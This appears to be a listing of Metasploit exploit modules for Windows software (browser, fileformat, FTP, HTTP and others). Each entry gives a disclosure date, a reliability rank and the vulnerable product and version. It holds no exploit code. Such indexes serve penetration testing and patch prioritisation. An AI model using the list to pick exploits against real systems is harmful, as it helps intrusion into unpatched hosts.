windows/browser/webex_ucf_newobject 2008-08-06 good WebEx UCF atucfobj.dll ActiveX NewObject Method Buffer Overflow
windows/browser/winamp_playlist_unc 2006-01-29 great Winamp Playlist UNC Path Computer Name Overflow
windows/browser/winamp_ultravox 2008-01-18 normal Winamp Ultravox Streaming Metadata (in_mp3.dll) Buffer Overflow
windows/browser/windvd7_applicationtype 2007-03-20 normal WinDVD7 IASystemInfo.DLL ActiveX Control Buffer Overflow
windows/browser/winzip_fileview 2007-11-02 normal WinZip FileView (WZFILEVIEW.FileViewCtrl.61) ActiveX Buffer Overflow
windows/browser/wmi_admintools 2010-12-21 great Microsoft WMI Administration Tools ActiveX Buffer Overflow
windows/browser/xmplay_asx 2006-11-21 good XMPlay 3.3.0.4 (ASX Filename) Buffer Overflow
windows/browser/yahoomessenger_fvcom 2007-08-30 normal Yahoo! Messenger YVerInfo.dll ActiveX Control Buffer Overflow
windows/browser/yahoomessenger_server 2007-06-05 good Yahoo! Messenger 8.1.0.249 ActiveX Control Buffer Overflow
windows/browser/zenturiprogramchecker_unsafe 2007-05-29 excellent Zenturi ProgramChecker ActiveX Control Arbitrary File Download
windows/dcerpc/ms03_026_dcom 2003-07-16 great Microsoft RPC DCOM Interface Overflow
windows/dcerpc/ms05_017_msmq 2005-04-12 good Microsoft Message Queueing Service Path Overflow
windows/dcerpc/ms07_029_msdns_zonename 2007-04-12 great Microsoft DNS RPC Service extractQuotedChar() Overflow (TCP)
windows/dcerpc/ms07_065_msmq 2007-12-11 good Microsoft Message Queueing Service DNS Name Path Overflow
windows/driver/broadcom_wifi_ssid 2006-11-11 low Broadcom Wireless Driver Probe Response SSID Overflow
windows/driver/dlink_wifi_rates 2006-11-13 low D-Link DWL-G132 Wireless Driver Beacon Rates Overflow
windows/driver/netgear_wg111_beacon 2006-11-16 low NetGear WG111v2 Wireless Driver Long Beacon Overflow
windows/email/ms07_017_ani_loadimage_chunksize 2007-03-28 great Windows ANI LoadAniIcon() Chunk Size Stack Buffer Overflow (SMTP)
windows/email/ms10_045_outlook_ref_only 2010-06-01 excellent Outlook ATTACH_BY_REF_ONLY File Execution
windows/email/ms10_045_outlook_ref_resolve 2010-06-01 excellent Outlook ATTACH_BY_REF_RESOLVE File Execution
windows/emc/alphastor_agent 2008-05-27 great EMC AlphaStor Agent Buffer Overflow
windows/fileformat/a-pdf_wav_to_mp3 2010-08-17 normal A-PDF WAV to MP3 v1.0.0 Buffer Overflow
windows/fileformat/acdsee_fotoslate_string 2011-09-12 good ACDSee FotoSlate PLP File id Parameter Overflow
windows/fileformat/acdsee_xpm 2007-11-23 good ACDSee XPM File Section Buffer Overflow
windows/fileformat/activepdf_webgrabber 2008-08-26 low activePDF WebGrabber ActiveX Control Buffer Overflow
windows/fileformat/adobe_collectemailinfo 2008-02-08 good Adobe Collab.collectEmailInfo() Buffer Overflow
windows/fileformat/adobe_cooltype_sing 2010-09-07 great Adobe CoolType SING Table “uniqueName” Stack Buffer Overflow
windows/fileformat/adobe_flashplayer_button 2010-10-28 normal Adobe Flash Player “Button” Remote Code Execution
windows/fileformat/adobe_flashplayer_newfunction 2010-06-04 normal Adobe Flash Player “newfunction” Invalid Pointer Use
windows/fileformat/adobe_flatedecode_predictor02 2009-10-08 good Adobe FlateDecode Stream Predictor 02 Integer Overflow
windows/fileformat/adobe_geticon 2009-03-24 good Adobe Collab.getIcon() Buffer Overflow
windows/fileformat/adobe_illustrator_v14_eps 2009-12-03 great Adobe Illustrator CS4 v14.0.0
windows/fileformat/adobe_jbig2decode 2009-02-19 good Adobe JBIG2Decode Memory Corruption
windows/fileformat/adobe_libtiff 2010-02-16 good Adobe Acrobat Bundled LibTIFF Integer Overflow
windows/fileformat/adobe_media_newplayer 2009-12-14 good Adobe Doc.media.newPlayer Use After Free Vulnerability
windows/fileformat/adobe_pdf_embedded_exe 2010-03-29 excellent Adobe PDF Embedded EXE Social Engineering
windows/fileformat/adobe_pdf_embedded_exe_nojs 2010-03-29 excellent Adobe PDF Escape EXE Social Engineering (No JavaScript)
windows/fileformat/adobe_reader_u3d 2011-12-06 average Adobe Reader U3D Memory Corruption Vulnerability
windows/fileformat/adobe_u3d_meshdecl 2009-10-13 good Adobe U3D CLODProgressiveMeshDeclaration Array Overrun
windows/fileformat/adobe_utilprintf 2008-02-08 good Adobe util.printf() Buffer Overflow
windows/fileformat/altap_salamander_pdb 2007-06-19 good Altap Salamander 2.5 PE Viewer Buffer Overflow
windows/fileformat/aol_desktop_linktag 2011-01-31 normal AOL Desktop 9.6 RTX Buffer Overflow
windows/fileformat/aol_phobos_bof 2010-01-20 average AOL 9.5 Phobos.Playlist Import() Stack-based Buffer Overflow
windows/fileformat/apple_quicktime_pnsize 2011-08-08 good Apple QuickTime PICT PnSize Buffer Overflow
windows/fileformat/audio_wkstn_pls 2009-12-08 good Audio Workstation 6.4.2.4.3 pls Buffer Overflow
windows/fileformat/audiotran_pls 2010-01-09 good Audiotran 1.4.1 (PLS File) Stack Buffer Overflow
windows/fileformat/aviosoft_plf_buf 2011-11-09 good Aviosoft Digital TV Player Professional 1.0 Stack Buffer Overflow
windows/fileformat/bacnet_csv 2010-09-16 good BACnet OPC Client Buffer Overflow
windows/fileformat/blazedvd_plf 2009-08-03 good BlazeDVD 5.1 PLF Buffer Overflow
windows/fileformat/bsplayer_m3u 2010-01-07 normal BS.Player 2.57 Buffer Overflow (Unicode SEH)
windows/fileformat/ca_cab 2007-06-05 good CA Antivirus Engine CAB Buffer Overflow
windows/fileformat/cain_abel_4918_rdp 2008-11-30 good Cain & Abel <= v4.9.24 RDP Buffer Overflow
windows/fileformat/ccmplayer_m3u_bof 2011-11-30 good CCMPlayer 1.5 m3u Playlist Stack Based Buffer Overflow
windows/fileformat/csound_getnum_bof 2012-02-23 normal Csound hetro File Handling Stack Buffer Overflow
windows/fileformat/cyberlink_p2g_bof 2011-09-12 great CyberLink Power2Go name attribute (p2g) Stack Buffer Overflow Exploit
windows/fileformat/cytel_studio_cy3 2011-10-02 good Cytel Studio 9.0 (CY3 File) Stack Buffer Overflow
windows/fileformat/deepburner_path 2006-12-19 great AstonSoft DeepBurner (DBR File) Path Buffer Overflow
windows/fileformat/destinymediaplayer16 2009-01-03 good Destiny Media Player 1.61 PLS M3U Buffer Overflow
windows/fileformat/digital_music_pad_pls 2010-09-17 normal Digital Music Pad Version 8.2.3.3.4 Stack Buffer Overflow
windows/fileformat/djstudio_pls_bof 2009-12-30 normal DJ Studio Pro 5.1 .pls Stack Buffer Overflow
windows/fileformat/djvu_imageurl 2008-10-30 low DjVu DjVu_ActiveX_MSOffice.dll ActiveX ComponentBuffer Overflow
windows/fileformat/dvdx_plf_bof 2007-06-02 normal DVD X Player 5.5 .plf PlayList Buffer Overflow
windows/fileformat/emc_appextender_keyworks 2009-09-29 average EMC ApplicationXtender (KeyWorks) ActiveX Control Buffer Overflow
windows/fileformat/esignal_styletemplate_bof 2011-09-06 normal eSignal and eSignal Pro <= 10.6.2425.1208 file parsing buffer overflow in QUO
windows/fileformat/etrust_pestscan 2009-11-02 average CA eTrust PestPatrol ActiveX Control Buffer Overflow
windows/fileformat/ezip_wizard_bof 2009-03-09 good eZip Wizard 3.0 Stack Buffer Overflow
windows/fileformat/fatplayer_wav 2010-10-18 normal Fat Player Media Player 0.6b0 Buffer Overflow
windows/fileformat/fdm_torrent 2009-02-02 good Free Download Manager Torrent Parsing Buffer Overflow
windows/fileformat/feeddemon_opml 2009-02-09 great FeedDemon <= 3.1.0.12 Stack Buffer Overflow
windows/fileformat/foxit_reader_filewrite 2011-03-05 normal Foxit PDF Reader 4.2 Javascript File Write
windows/fileformat/foxit_reader_launch 2009-03-09 good Foxit Reader 3.0 Open Execute Action Stack Based Buffer Overflow
windows/fileformat/foxit_title_bof 2010-11-13 great Foxit PDF Reader v4.1.1 Title Stack Buffer Overflow
windows/fileformat/free_mp3_ripper_wav 2011-08-27 great Free MP3 CD Ripper 1.1 WAV File Stack Buffer Overflow
windows/fileformat/galan_fileformat_bof 2009-12-07 normal gAlan 0.2.1 Buffer Overflow
windows/fileformat/gsm_sim 2010-07-07 normal GSM SIM Editor 5.15 Buffer Overflow
windows/fileformat/gta_samp 2011-09-18 normal GTA SA-MP server.cfg Buffer Overflow
windows/fileformat/hhw_hhp_compiledfile_bof 2006-02-06 good HTML Help Workshop 4.74 (hhp Project File) Buffer Overflow
windows/fileformat/hhw_hhp_contentfile_bof 2006-02-06 good HTML Help Workshop 4.74 (hhp Project File) Buffer Overflow
windows/fileformat/hhw_hhp_indexfile_bof 2009-01-17 good HTML Help Workshop 4.74 (hhp Project File) Buffer Overflow
windows/fileformat/ht_mp3player_ht3_bof 2009-06-29 good HT-MP3Player 1.0 HT3 File Parsing Buffer Overflow
windows/fileformat/ibm_pcm_ws 2012-02-28 great IBM Personal Communications iSeries Access WorkStation 5.9 Profile
windows/fileformat/ideal_migration_ipj 2009-12-05 great PointDev IDEAL Migration Buffer Overflow
windows/fileformat/ispvm_xcf_ispxcf 2012-05-16 normal Lattice Semiconductor ispVM System XCF File Handling Overflow
windows/fileformat/lotusnotes_lzh 2011-05-24 good Lotus Notes 8.0.x - 8.5.2 FP2 - Autonomy Keyview (.lzh Attachment)
windows/fileformat/magix_musikmaker_16_mmm 2011-04-26 good Magix Musik Maker 16 .mmm Stack Buffer Overflow
windows/fileformat/mcafee_hercules_deletesnapshot 2008-08-04 low McAfee Remediation Client ActiveX Control Buffer Overflow
windows/fileformat/mcafee_showreport_exec 2012-01-12 normal McAfee SaaS MyCioScan ShowReport Remote Command Execution
windows/fileformat/mediajukebox 2009-07-01 normal Media Jukebox 8.0.400 Buffer Overflow (SEH)
windows/fileformat/microp_mppl 2010-08-23 great MicroP 0.1.1.1600 (MPPL File) Stack Buffer Overflow
windows/fileformat/millenium_mp3_pls 2009-07-30 great Millenium MP3 Studio 2.0 (PLS File) Stack Buffer Overflow
windows/fileformat/mini_stream_pls_bof 2010-07-16 great Mini-Stream RM-MP3 Converter v3.1.2.1 PLS File Stack Buffer Overflow
windows/fileformat/mjm_coreplayer2011_s3m 2011-04-30 good MJM Core Player 2011 .s3m Stack Buffer Overflow
windows/fileformat/mjm_quickplayer_s3m 2011-04-30 good MJM QuickPlayer 1.00 beta 60a / QuickPlayer 2010 .s3m Stack Buffer Overflow
windows/fileformat/moxa_mediadbplayback 2010-10-19 average MOXA MediaDBPlayback ActiveX Control Buffer Overflow
windows/fileformat/mplayer_sami_bof 2011-05-19 normal MPlayer SAMI Subtitle File Buffer Overflow
windows/fileformat/ms09_067_excel_featheader 2009-11-10 good Microsoft Excel Malformed FEATHEADER Record Vulnerability
windows/fileformat/ms10_004_textbytesatom 2010-02-09 good Microsoft PowerPoint Viewer TextBytesAtom Stack Buffer Overflow
windows/fileformat/ms10_038_excel_obj_bof 2010-06-08 normal MS11-038 Microsoft Office Excel Malformed OBJ Record Handling Overflow
windows/fileformat/ms10_087_rtf_pfragments_bof 2010-11-09 great Microsoft Word RTF pFragments Stack Buffer Overflow (File Format)
windows/fileformat/ms11_006_createsizeddibsection 2010-12-15 great Microsoft Windows CreateSizedDIBSECTION Stack Buffer Overflow
windows/fileformat/ms11_021_xlb_bof 2011-08-09 normal MS11-021 Microsoft Office 2007 Excel .xlb Buffer Overflow
windows/fileformat/ms12_005 2012-01-10 excellent MS12-005 Microsoft Office ClickOnce Unsafe Object Package Handling Vulnerability
windows/fileformat/ms12_027_mscomctl_bof 2012-04-10 average MS12-027 MSCOMCTL ActiveX Buffer Overflow
windows/fileformat/ms_visual_basic_vbp 2007-09-04 good Microsoft Visual Basic VBP Buffer Overflow
windows/fileformat/msworks_wkspictureinterface 2008-11-28 low Microsoft Works 7 WkImgSrv.dll WKsPictureInterface() ActiveX Code Execution
windows/fileformat/mymp3player_m3u 2010-03-18 good Steinberg MyMP3Player 3.0 Buffer Overflow
windows/fileformat/netop 2011-04-28 normal NetOp Remote Control Client 9.5 Buffer Overflow
windows/fileformat/nuance_pdf_launch_overflow 2010-10-08 great Nuance PDF Reader v6.0 Launch Stack Buffer Overflow
windows/fileformat/openoffice_ole 2008-04-17 normal OpenOffice OLE Importer DocumentSummaryInformation Stream Handling Overflow
windows/fileformat/orbit_download_failed_bof 2008-04-03 normal Orbit Downloader URL Unicode Conversion Overflow
windows/fileformat/orbital_viewer_orb 2010-02-27 great Orbital Viewer ORB File Parsing Buffer Overflow
windows/fileformat/proshow_cellimage_bof 2009-08-20 great ProShow Gold v4.0.2549 (PSH File) Stack Buffer Overflow
windows/fileformat/real_networks_netzip_bof 2011-01-30 good Real Networks Netzip Classic 7.5.1 86 File Parsing Buffer Overflow Vulnerability
windows/fileformat/safenet_softremote_groupname 2009-10-30 good SafeNet SoftRemote GROUPNAME Buffer Overflow
windows/fileformat/sascam_get 2008-12-29 low SasCam Webcam Server v.2.6.5 Get() method Buffer Overflow
windows/fileformat/scadaphone_zip 2011-09-12 good ScadaTEC ScadaPhone <= v5.3.11.1230 Stack Buffer Overflow
windows/fileformat/shadow_stream_recorder_bof 2010-03-29 normal Shadow Stream Recorder 3.0.1.7 Buffer Overflow
windows/fileformat/somplplayer_m3u 2010-01-22 great S.O.M.P.L 1.0 Player Buffer Overflow
windows/fileformat/subtitle_processor_m3u_bof 2011-04-26 normal Subtitle Processor 7.7.1 .M3U SEH Unicode Buffer Overflow
windows/fileformat/tugzip 2008-10-28 good TugZip 3.5 Zip File Parsing Buffer Overflow Vulnerability
windows/fileformat/ultraiso_ccd 2009-04-03 great UltraISO CCD File Parsing Buffer Overflow
windows/fileformat/ultraiso_cue 2007-05-24 great UltraISO CUE File Parsing Buffer Overflow
windows/fileformat/ursoft_w32dasm 2005-01-24 good URSoft W32Dasm Disassembler Function Buffer Overflow
windows/fileformat/varicad_dwb 2010-03-17 great VariCAD 2010-2.05 EN (DWB File) Stack Buffer Overflow
windows/fileformat/videolan_tivo 2008-10-22 good VideoLAN VLC TiVo Buffer Overflow
windows/fileformat/videospirit_visprj 2011-04-11 good VeryTools Video Spirit Pro <= 1.70
windows/fileformat/visio_dxf_bof 2010-05-04 good Microsoft Office Visio VISIODWG.DLL DXF File Handling Vulnerability
windows/fileformat/visiwave_vwr_type 2011-05-20 great VisiWave VWR File Parsing Vulnerability
windows/fileformat/vlc_modplug_s3m 2011-04-07 average VideoLAN VLC ModPlug ReadS3M Stack Buffer Overflow
windows/fileformat/vlc_realtext 2008-11-05 good VLC Media Player RealText Subtitle Overflow
windows/fileformat/vlc_smb_uri 2009-06-24 great VideoLAN Client (VLC) Win32 smb:// URI Buffer Overflow
windows/fileformat/vlc_webm 2011-01-31 good VideoLAN VLC MKV Memory Corruption
windows/fileformat/vuplayer_cue 2009-08-18 good VUPlayer CUE Buffer Overflow
windows/fileformat/vuplayer_m3u 2009-08-18 good VUPlayer M3U Buffer Overflow
windows/fileformat/wireshark_packet_dect 2011-04-18 good Wireshark <= 1.4.4 packet-dect.c Stack Buffer Overflow (local)
windows/fileformat/wm_downloader_m3u 2010-07-28 normal WM Downloader 3.1.2.2 Buffer Overflow
windows/fileformat/xenorate_xpl_bof 2009-08-19 great Xenorate 2.50 (.xpl) universal Local Buffer Overflow (SEH)
windows/fileformat/xion_m3u_sehbof 2010-11-23 great Xion Audio Player 1.0.126 Unicode Stack Buffer Overflow
windows/fileformat/xradio_xrl_sehbof 2011-02-08 normal xRadio 0.95b Buffer Overflow
windows/fileformat/zinfaudioplayer221_pls 2004-09-24 good Zinf Audio Player 2.2.1 (PLS File) Stack Buffer Overflow
windows/firewall/blackice_pam_icq 2004-03-18 great ISS PAM.dll ICQ Parser Buffer Overflow
windows/firewall/kerio_auth 2003-04-28 average Kerio Firewall 2.1.4 Authentication Packet Overflow
windows/ftp/32bitftp_list_reply 2010-10-12 good 32bit FTP Client Stack Buffer Overflow
windows/ftp/3cdaemon_ftp_user 2005-01-04 average 3Com 3CDaemon 2.0 FTP Username Overflow
windows/ftp/aasync_list_reply 2010-10-12 good AASync v2.2.1.0 (Win32) Stack Buffer Overflow (LIST)
windows/ftp/ability_server_stor 2004-10-22 normal Ability Server 2.34 STOR Command Stack Buffer Overflow
windows/ftp/absolute_ftp_list_bof 2011-11-09 normal AbsoluteFTP 1.9.6 - 2.2.10 LIST Command Remote Buffer Overflow
windows/ftp/cesarftp_mkd 2006-06-12 average Cesar FTP 0.99g MKD Command Buffer Overflow
windows/ftp/dreamftp_format 2004-03-03 good BolinTech Dream FTP Server 1.02 Format String
windows/ftp/easyfilesharing_pass 2006-07-31 average Easy File Sharing FTP Server 2.0 PASS Overflow
windows/ftp/easyftp_cwd_fixret 2010-02-16 great EasyFTP Server <= 1.7.0.11 CWD Command Stack Buffer Overflow
windows/ftp/easyftp_list_fixret 2010-07-05 great EasyFTP Server <= 1.7.0.11 LIST Command Stack Buffer Overflow
windows/ftp/easyftp_mkd_fixret 2010-04-04 great EasyFTP Server <= 1.7.0.11 MKD Command Stack Buffer Overflow
windows/ftp/filecopa_list_overflow 2006-07-19 average FileCopa FTP Server pre 18 Jul Version
windows/ftp/filewrangler_list_reply 2010-10-12 good FileWrangler 5.30 Stack Buffer Overflow
windows/ftp/freeftpd_user 2005-11-16 average freeFTPd 1.0 Username Overflow
windows/ftp/ftpgetter_pwd_reply 2010-10-12 good FTPGetter Standard v3.55.0.05 Stack Buffer Overflow (PWD)
windows/ftp/ftppad_list_reply 2010-10-12 good FTPPad 1.2.0 Stack Buffer Overflow
windows/ftp/ftpshell51_pwd_reply 2010-10-12 good FTPShell 5.1 Stack Buffer Overflow
windows/ftp/ftpsynch_list_reply 2010-10-12 good FTP Synchronizer Professional 4.0.73.274 Stack Buffer Overflow
windows/ftp/gekkomgr_list_reply 2010-10-12 good Gekko Manager FTP Client Stack Buffer Overflow
windows/ftp/globalscapeftp_input 2005-05-01 great GlobalSCAPE Secure FTP Server Input Overflow
windows/ftp/goldenftp_pass_bof 2011-01-23 average GoldenFTP PASS Stack Buffer Overflow
windows/ftp/httpdx_tolog_format 2009-11-17 great HTTPDX tolog() Function Format String Vulnerability
windows/ftp/leapftp_list_reply 2010-10-12 good LeapFTP 3.0.1 Stack Buffer Overflow
windows/ftp/leapftp_pasv_reply 2003-06-09 normal LeapWare LeapFTP v2.7.3.600 PASV Reply Client Overflow
windows/ftp/ms09_053_ftpd_nlst 2009-08-31 great Microsoft IIS FTP Server NLST Response Overflow
windows/ftp/netterm_netftpd_user 2005-04-26 great NetTerm NetFTPD USER Buffer Overflow
windows/ftp/odin_list_reply 2010-10-12 good Odin Secure FTP 4.1 Stack Buffer Overflow (LIST)
windows/ftp/oracle9i_xdb_ftp_pass 2003-08-18 great Oracle 9i XDB FTP PASS Overflow (win32)
windows/ftp/oracle9i_xdb_ftp_unlock 2003-08-18 great Oracle 9i XDB FTP UNLOCK Overflow (win32)
windows/ftp/proftp_banner 2009-08-25 normal ProFTP 2.9 Banner Remote Buffer Overflow
windows/ftp/quickshare_traversal_write 2011-02-03 excellent QuickShare File Server 1.2.1 Directory Traversal Vulnerability
windows/ftp/ricoh_dl_bof 2012-03-01 normal Ricoh DC DL-10 SR10 FTP USER Command Buffer Overflow
windows/ftp/sami_ftpd_user 2006-01-24 normal KarjaSoft Sami FTP Server v2.02 USER Overflow
windows/ftp/sasser_ftpd_port 2004-05-10 average Sasser Worm avserve FTP PORT Buffer Overflow
windows/ftp/scriptftp_list 2011-10-12 good ScriptFTP <= 3.3 Remote Buffer Overflow (LIST)
windows/ftp/seagull_list_reply 2010-10-12 good Seagull FTP v3.3 build 409 Stack Buffer Overflow
windows/ftp/servu_chmod 2004-12-31 normal Serv-U FTP Server < 4.2 Buffer Overflow
windows/ftp/servu_mdtm 2004-02-26 good Serv-U FTPD MDTM Overflow
windows/ftp/slimftpd_list_concat 2005-07-21 great SlimFTPd LIST Concatenation Overflow
windows/ftp/trellian_client_pasv 2010-04-11 normal Trellian FTP Client 3.01 PASV Remote Buffer Overflow
windows/ftp/vermillion_ftpd_port 2009-09-23 great Vermillion FTP Daemon PORT Command Memory Corruption
windows/ftp/warftpd_165_pass 1998-03-19 average War-FTPD 1.65 Password Overflow
windows/ftp/warftpd_165_user 1998-03-19 average War-FTPD 1.65 Username Overflow
windows/ftp/wftpd_size 2006-08-23 average Texas Imperial Software WFTPD 3.23 SIZE Overflow
windows/ftp/wsftp_server_503_mkd 2004-11-29 great WS-FTP Server 5.03 MKD Overflow
windows/ftp/wsftp_server_505_xmd5 2006-09-14 average Ipswitch WS_FTP Server 5.05 XMD5 Overflow
windows/ftp/xftp_client_pwd 2010-04-22 normal Xftp FTP Client 3.0 PWD Remote Buffer Overflow
windows/ftp/xlink_client 2009-10-03 normal Xlink FTP Client Buffer Overflow
windows/ftp/xlink_server 2009-10-03 good Xlink FTP Server Buffer Overflow
windows/games/mohaa_getinfo 2004-07-17 great Medal Of Honor Allied Assault getinfo Stack Buffer Overflow
windows/games/racer_503beta5 2008-08-10 great Racer v0.5.3 beta 5 Buffer Overflow
windows/games/ut2004_secure 2004-06-18 good Unreal Tournament 2004 “secure” Overflow (Win32)
windows/http/adobe_robohelper_authbypass 2009-09-23 excellent Adobe RoboHelp Server 8 Arbitrary File Upload and Execute
windows/http/altn_securitygateway 2008-06-02 average Alt-N SecurityGateway username Buffer Overflow
windows/http/altn_webadmin 2003-06-24 average Alt-N WebAdmin USER Buffer Overflow
windows/http/amlibweb_webquerydll_app 2010-08-03 normal Amlibweb NetOpacs webquery.dll Stack Buffer Overflow
windows/http/apache_chunked 2002-06-19 good Apache Win32 Chunked Encoding
windows/http/apache_mod_rewrite_ldap 2006-07-28 great Apache module mod_rewrite LDAP protocol Buffer Overflow
windows/http/apache_modjk_overflow 2007-03-02 great Apache mod_jk 1.2.20 Buffer Overflow
windows/http/badblue_ext_overflow 2003-04-20 great BadBlue 2.5 EXT.dll Buffer Overflow
windows/http/badblue_passthru 2007-12-10 great BadBlue 2.72b PassThru Buffer Overflow
windows/http/bea_weblogic_jsessionid 2009-01-13 good BEA WebLogic JSESSIONID Cookie Value Overflow
windows/http/bea_weblogic_post_bof 2008-07-17 great Oracle Weblogic Apache Connector POST Request Buffer Overflow
windows/http/bea_weblogic_transfer_encoding 2008-09-09 great BEA Weblogic Transfer-Encoding Buffer Overflow
windows/http/belkin_bulldog 2009-03-08 average Belkin Bulldog Plus Web Service Buffer Overflow
windows/http/ca_arcserve_rpc_authbypass 2011-07-25 excellent CA Arcserve D2D GWT RPC Credential Information Disclosure
windows/http/ca_igateway_debug 2005-10-06 average CA iTechnology iGateway Debug Mode Buffer Overflow
windows/http/ca_totaldefense_regeneratereports 2011-04-13 excellent CA Total Defense Suite reGenerateReports Stored Procedure SQL Injection
windows/http/coldfusion_fckeditor 2009-07-03 excellent ColdFusion 8.0.1 Arbitrary File Upload and Execute
windows/http/easyftp_list 2010-02-18 great EasyFTP Server <= 1.7.0.11 list.html path Stack Buffer Overflow
windows/http/edirectory_host 2006-10-21 great Novell eDirectory NDS Server Host Header Overflow
windows/http/edirectory_imonitor 2005-08-11 great eDirectory 8.7.3 iMonitor Remote Stack Buffer Overflow
windows/http/efs_easychatserver_username 2007-08-14 great EFS Easy Chat Server Authentication Request Handling Buffer Overflow
windows/http/fdm_auth_header 2009-02-02 great Free Download Manager Remote Control Server Buffer Overflow
windows/http/hp_nnm_getnnmdata_hostname 2010-05-11 great HP OpenView Network Node Manager getnnmdata.exe (Hostname) CGI Buffer Overflow
windows/http/hp_nnm_getnnmdata_icount 2010-05-11 great HP OpenView Network Node Manager getnnmdata.exe (ICount) CGI Buffer Overflow
windows/http/hp_nnm_getnnmdata_maxage 2010-05-11 great HP OpenView Network Node Manager getnnmdata.exe (MaxAge) CGI Buffer Overflow
windows/http/hp_nnm_nnmrptconfig_nameparams 2011-01-10 normal HP OpenView NNM nnmRptConfig nameParams Buffer Overflow
windows/http/hp_nnm_nnmrptconfig_schdparams 2011-01-10 normal HP OpenView NNM nnmRptConfig.exe schdParams Buffer Overflow
windows/http/hp_nnm_openview5 2007-12-06 great HP OpenView Network Node Manager OpenView5.exe CGI Buffer Overflow
windows/http/hp_nnm_ovalarm_lang 2009-12-09 great HP OpenView Network Node Manager ovalarm.exe CGI Buffer Overflow
windows/http/hp_nnm_ovas 2008-04-02 good HP OpenView NNM 7.53, 7.51 OVAS.EXE Pre-Authentication Stack Buffer Overflow
windows/http/hp_nnm_ovbuildpath_textfile 2011-11-01 normal HP OpenView Network Node Manager ov.dll _OVBuildPath Buffer Overflow
windows/http/hp_nnm_ovwebhelp 2009-12-09 great HP OpenView Network Node Manager OvWebHelp.exe CGI Buffer Overflow
windows/http/hp_nnm_ovwebsnmpsrv_main 2010-06-16 great HP OpenView Network Node Manager ovwebsnmpsrv.exe main Buffer Overflow
windows/http/hp_nnm_ovwebsnmpsrv_ovutil 2010-06-16 great HP OpenView Network Node Manager ovwebsnmpsrv.exe ovutil Buffer Overflow
windows/http/hp_nnm_ovwebsnmpsrv_uro 2010-06-08 great HP OpenView Network Node Manager ovwebsnmpsrv.exe Unrecognized Option Buffer Overflow
windows/http/hp_nnm_snmp 2009-12-09 great HP OpenView Network Node Manager Snmp.exe CGI Buffer Overflow
windows/http/hp_nnm_snmpviewer_actapp 2010-05-11 great HP OpenView Network Node Manager snmpviewer.exe Buffer Overflow
windows/http/hp_nnm_toolbar_01 2009-01-07 great HP OpenView Network Node Manager Toolbar.exe CGI Buffer Overflow
windows/http/hp_nnm_toolbar_02 2009-01-21 normal HP OpenView Network Node Manager Toolbar.exe CGI Cookie Handling Buffer Overflow
windows/http/hp_nnm_webappmon_execvp 2010-07-20 great HP OpenView Network Node Manager execvp_nc Buffer Overflow
windows/http/hp_nnm_webappmon_ovjavalocale 2010-08-03 great HP NNM CGI webappmon.exe OvJavaLocale Buffer Overflow
windows/http/hp_openview_insight_backdoor 2011-01-31 excellent HP OpenView Performance Insight Server Backdoor Account Code Execution
windows/http/hp_power_manager_filename 2011-10-19 normal HP Power Manager ‘formExportDataLogs’ Buffer Overflow
windows/http/hp_power_manager_login 2009-11-04 average Hewlett-Packard Power Manager Administration Buffer Overflow
windows/http/httpdx_handlepeer 2009-10-08 great HTTPDX h_handlepeer() Function Buffer Overflow
windows/http/httpdx_tolog_format 2009-11-17 great HTTPDX tolog() Function Format String Vulnerability
windows/http/ia_webmail 2003-11-03 average IA WebMail 3.x Buffer Overflow
windows/http/ibm_tivoli_endpoint_bof 2011-05-31 good IBM Tivoli Endpoint Manager POST Query Buffer Overflow
windows/http/ibm_tpmfosd_overflow 2007-05-02 good IBM TPM for OS Deployment 5.1.0.x rembo.exe Buffer Overflow
windows/http/ibm_tsm_cad_header 2007-09-24 good IBM Tivoli Storage Manager Express CAD Service Buffer Overflow
windows/http/icecast_header 2004-09-28 great Icecast (<= 2.0.1) Header Overwrite (win32)
windows/http/integard_password_bof 2010-09-07 great Race River Integard Home/Pro LoginAdmin Password Stack Buffer Overflow
windows/http/intersystems_cache 2009-09-29 great InterSystems Cache UtilConfigHome.csp Argument Buffer Overflow
windows/http/ipswitch_wug_maincfgret 2004-08-25 great Ipswitch WhatsUp Gold 8.03 Buffer Overflow
windows/http/kolibri_http 2010-12-26 good Kolibri <= v2.0 HTTP Server HEAD Buffer Overflow
windows/http/landesk_thinkmanagement_upload_asp 2012-02-15 excellent LANDesk Lenovo ThinkManagement Console Remote Command Execution
windows/http/mailenable_auth_header 2005-04-24 great MailEnable Authorization Header Buffer Overflow
windows/http/manageengine_apps_mngr 2011-04-08 average ManageEngine Applications Manager Authenticated Code Execution
windows/http/maxdb_webdbm_database 2006-08-29 good MaxDB WebDBM Database Parameter Overflow
windows/http/maxdb_webdbm_get_overflow 2005-04-26 good MaxDB WebDBM GET Buffer Overflow
windows/http/mcafee_epolicy_source 2006-07-17 average McAfee ePolicy Orchestrator / ProtectionPilot Overflow
windows/http/mdaemon_worldclient_form2raw 2003-12-29 great MDaemon <= 6.8.5 WorldClient form2raw.cgi Stack Buffer Overflow
windows/http/minishare_get_overflow 2004-11-07 average Minishare 1.4.1 Buffer Overflow
windows/http/navicopa_get_overflow 2006-09-28 great NaviCOPA 2.0.1 URL Handling Buffer Overflow
windows/http/netdecision_http_bof 2012-02-24 normal NetDecision 4.5.1 HTTP Server Buffer Overflow
windows/http/novell_imanager_upload 2010-10-01 excellent Novell iManager getMultiPartParameters Arbitrary File Upload
windows/http/novell_messenger_acceptlang 2006-04-13 average Novell Messenger Server 2.0 Accept-Language Overflow
windows/http/nowsms 2008-02-19 good Now SMS/MMS Gateway Buffer Overflow
windows/http/oracle9i_xdb_pass 2003-08-18 great Oracle 9i XDB HTTP PASS Overflow (win32)
windows/http/osb_uname_jlist 2010-07-13 excellent Oracle Secure Backup Authentication Bypass/Command Injection Vulnerability
windows/http/peercast_url 2006-03-08 average PeerCast <= 0.1216 URL Handling Buffer Overflow (win32)
windows/http/privatewire_gateway 2006-06-26 average Private Wire Gateway Buffer Overflow
windows/http/psoproxy91_overflow 2004-02-20 average PSO Proxy v0.91 Stack Buffer Overflow
windows/http/rabidhamster_r4_log 2012-02-09 normal RabidHamster R4 Log Entry sprintf() Buffer Overflow
windows/http/sambar6_search_results 2003-06-21 normal Sambar 6 Search Results Buffer Overflow
windows/http/sap_mgmt_con_osexec_payload 2011-03-08 excellent SAP Management Console OSExecute Payload Execution
windows/http/sapdb_webtools 2007-07-05 great SAP DB 7.4 WebTools Buffer Overflow
windows/http/savant_31_overflow 2002-09-10 great Savant 3.1 Web Server Overflow
windows/http/servu_session_cookie 2009-11-01 good Rhinosoft Serv-U Session Cookie Buffer Overflow
windows/http/shoutcast_format 2004-12-23 average SHOUTcast DNAS/win32 1.9.4 File Request Format String Overflow
